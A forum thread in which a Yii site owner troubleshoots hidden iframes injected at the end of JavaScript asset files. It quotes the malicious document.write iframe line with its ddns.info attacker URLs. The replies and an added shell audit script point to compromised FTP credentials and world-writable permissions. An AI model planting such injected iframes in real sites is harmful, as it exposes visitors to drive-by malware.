Urgent, Iframes Being Inserted Into Yii Extensions

Hi guys. A few days ago, my site was detected by Google as a disseminator of malware, with a red screen asking whether the user wanted to continue anyway or not. I found the "Webmaster Tools" tool and added my site. That tool showed me that the file detected as a threat was jnotify.js (JNotify extension, inside the assets directory).

I looked inside the file and I noticed that there was an iframe at the end of the file with a strange URL. So I removed the extension because I was not using it, asked Google for a review, and the problem was solved. But many users were sending me emails saying that their anti-virus was detecting threats in many JS files inside the assets directory.

I looked inside them and again I noticed that there was an iframe at the end of each file, but with the Google URL "http://google.com", so I removed all the iframes inside the files. But the iframes at the end of the files appeared again, so I removed every directory inside the assets directory and apparently the problem was solved.

Today I received an email with the anti-virus diagnosis showing that the same files were detected as a threat for the second time. The URL in the iframes is: http://cvrtyi.ddns.info.

I don't know what or who is inserting these malicious iframes at the end of the JavaScript files in the assets folder. Please, someone help me solve this problem.


Just to add information. This is the code being entered:

document.write('<iframe width="10" height="10" style="width:100px;height:100px;position:absolute;left:-100px;top:0;" src="http://byiegfs.ddns.info/nighttrend.cgi?8"></iframe>  ');

This is a hidden iframe "injection" attack. Validate your file permissions are correct and also that your FTP credentials have not been compromised. The last time I dealt with this the FTP account credentials were compromised and the files were being modified that way. There are other ways this could be happening, but that is the most likely. Check your logs to confirm.


Thank you very much!

The problem is that the assets directory needs write permission, and it is precisely in this directory that the files are being modified. The octal for this directory is set as: rwxrwxrwx.

Is that right?

What do you mean it needs permission to write?! Your users don’t have to have write access to this directory. You should change its permissions to rwxr-xr-x. If your host is Linux then you can run this command to make that happen:

chmod -R 755 assets
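
The two checks suggested in the replies above (file contents and file permissions) can be run as one audit. This is an added example, not part of any poster's reply; the function names, the sample tree and the example.invalid URL are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the thread): audit a web "assets" directory.

# List .js files whose final lines contain a document.write() that emits an
# <iframe>, the shape of the injected code quoted in this thread.
find_injected_js() {
    find "$1" -type f -name '*.js' | sort | while IFS= read -r f; do
        if tail -n 5 "$f" | grep -Eiq 'document\.write\(.*<iframe'; then
            printf '%s\n' "$f"
        fi
    done
}

# List files and directories writable by every local account (mode o+w),
# such as the rwxrwxrwx assets directory described above.
find_world_writable() {
    find "$1" \( -type f -o -type d \) -perm -0002 | sort
}

# Build a constructed sample tree: one clean file, one with an appended iframe.
# The URL is a placeholder (example.invalid), not an indicator from the thread.
build_sample() {
    mkdir -p "$1/assets/ab12cd"
    printf 'function notify(m){alert(m);}\n' > "$1/assets/ab12cd/clean.js"
    {
        printf 'function notify(m){alert(m);}\n'
        printf '%s\n' "document.write('<iframe width=\"10\" height=\"10\" src=\"http://example.invalid/x\"></iframe>');"
    } > "$1/assets/ab12cd/jnotify.js"
    chmod 755 "$1/assets" "$1/assets/ab12cd"
    chmod 644 "$1/assets/ab12cd/clean.js"
    chmod 666 "$1/assets/ab12cd/jnotify.js"
}

# Run both checks against the constructed tree, then clean up.
demo() {
    tmp=$(mktemp -d) || return 1
    build_sample "$tmp"
    echo "Injected iframe found in:"; find_injected_js "$tmp/assets"
    echo "World-writable entries:";   find_world_writable "$tmp/assets"
    rm -rf "$tmp"
}
demo
```

Point both functions at the real assets path and compare any hit against a clean copy of the extension; a match only in the last lines of a file is consistent with code appended after deployment.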

Hi guys. I solved the problem by changing all the FTP client passwords and the permissions of the app files. I deleted the app that was in production and uploaded another clean one. Never again will I use Microsoft Windows, because my PC was infected by a trojan that caused this nightmare. My tip is: do not use Microsoft Windows computers that access the application server.

Thank you guys for your replies.